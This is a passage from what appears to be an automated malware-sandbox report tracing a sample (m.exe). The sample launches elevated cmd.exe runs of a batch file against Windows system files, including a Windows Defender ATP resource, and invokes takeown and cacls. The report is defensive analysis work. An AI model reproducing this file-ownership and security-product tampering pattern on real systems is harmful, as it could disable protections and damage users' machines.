| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff931f40000, flags = GET_MODULE_HANDLE_EX_FLAG_PIN |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | address_out = 0x7ff931fe5a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ff931fe5a50 |
|
2 |
System (5646)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 226859 |
|
1 | |
| Get Time | type = Ticks, time = 317281 |
|
1 | |
| Get Time | type = System Time, time = 2019-04-17 10:42:46 (UTC) |
|
1 | |
| Get Info | - |
|
5640 | |
| Get Info | - |
|
3 |
Process #108: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #108 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1288 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
12F0
0x
12DC
0x
12D8
0x
12D4
0x
12D0
0x
12CC
0x
12C8
0x
12C4
0x
12C0
0x
128C
0x
1060
|
Process #109: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #109 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe -RegisterDevice -SettingChange -Full |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:01:34 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1328 |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
13C8
0x
132C
0x
10F8
0x
D94
0x
1118
0x
1310
0x
4C8
|
Process #110: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #110 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1398 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
13C4
0x
13BC
0x
13B4
0x
13AC
0x
139C
|
Process #111: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #111 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:38, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:47 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10cc |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
10C8
0x
F30
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 106 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0xf78, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0xef8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Workflow.Targets" |
|
1 |
Process #112: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #112 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:17, Reason: Self Terminated |
| Monitor Duration | 00:00:35 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DAC
0x
4BC
0x
504
0x
1200
0x
FB4
0x
C38
0x
910
0x
AEC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| dllhost.exe | 0x7FF6FB010000 | 0x7FF6FB018FFF | Process Termination | - | 64-bit | - |
|
|
|
Process #114: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #114 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:44, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeb4 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F84
0x
D0C
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 104 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 89 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 160, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1100, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x1340, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "MsSense.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "MsSense.exe.mui" |
|
1 |
Process #116: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #116 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:49, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1124 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
11A4
0x
1054
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x10a8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
